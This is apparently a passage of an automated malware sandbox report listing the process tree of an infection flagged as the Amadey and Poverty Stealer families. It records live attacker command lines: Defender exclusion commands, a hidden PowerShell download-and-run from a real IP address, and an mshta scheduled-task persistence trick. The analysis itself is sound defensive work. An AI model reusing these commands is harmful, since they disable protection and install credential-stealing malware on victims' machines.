                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                        Start time:03:48:48
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Documents\GIIIIJDHJE.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Documents\GIIIIJDHJE.exe"
                                                                                                                                                                                                                        Imagebase:0x780000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000002.2287015642.0000000000781000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                        Start time:03:48:52
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                                                        Imagebase:0xfa0000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000002.2329860638.0000000000FA1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                        Start time:03:49:00
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        Imagebase:0xfa0000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                        Start time:03:49:09
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe"
                                                                                                                                                                                                                        Imagebase:0x6e0000
                                                                                                                                                                                                                        File size:1'704'448 bytes
                                                                                                                                                                                                                        MD5 hash:27998D2440B5A856ECA1795EABB8FA23
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: 00000010.00000002.2504667961.00000000006E1000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                                                        • Rule: JoeSecurity_PovertyStealer, Description: Yara detected Poverty Stealer, Source: 00000010.00000003.2453745116.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                        • Detection: 65%, ReversingLabs
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                        Start time:03:49:12
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe"
                                                                                                                                                                                                                        Imagebase:0x8d0000
                                                                                                                                                                                                                        File size:15'360 bytes
                                                                                                                                                                                                                        MD5 hash:9BE5AC720DCF1838FD5A2D7352672F66
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                        • Detection: 30%, ReversingLabs
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                        Start time:03:49:12
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp'
                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff70f330000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                        Start time:03:49:16
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                        Start time:03:49:18
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0x240000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                        Start time:03:49:18
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                        Start time:03:49:20
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:mshta "C:\Temp\.hta"
                                                                                                                                                                                                                        Imagebase:0x9f0000
                                                                                                                                                                                                                        File size:13'312 bytes
                                                                                                                                                                                                                        MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                        Start time:03:49:20
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:schtasks /delete /tn "AutoRunHTA" /f
                                                                                                                                                                                                                        Imagebase:0xa70000
                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                        Start time:03:49:20
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                                                                                                                                                                                                        Imagebase:0xa70000
                                                                                                                                                                                                                        File size:187'904 bytes
                                                                                                                                                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                        Start time:03:49:20
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                        Start time:03:49:20
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                        Start time:03:49:20
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:cmd.exe /c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" & start mshta "C:\Temp\\random.hta")
                                                                                                                                                                                                                        Imagebase:0x7ff6ec4b0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                        Start time:03:49:21
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                        Start time:03:49:22
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:mshta "C:\Temp\\random.hta"
                                                                                                                                                                                                                        Imagebase:0x7ff764df0000
                                                                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                        Start time:03:49:22
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                        Start time:03:49:22
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                        Start time:03:49:24
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                                                                                                                                                                                                        Imagebase:0xbb0000
                                                                                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                        Start time:03:49:24
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                        Start time:03:49:26
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002B.00000002.2673808874.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                        Start time:03:49:31
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002C.00000002.2780754932.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                        Start time:03:49:32
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                                                                                                                                                                                                        Imagebase:0x7ff7542e0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                        Start time:03:49:32
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:47
                                                                                                                                                                                                                        Start time:03:49:32
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                                                                                                                                                                                                        Imagebase:0x7ff7542e0000
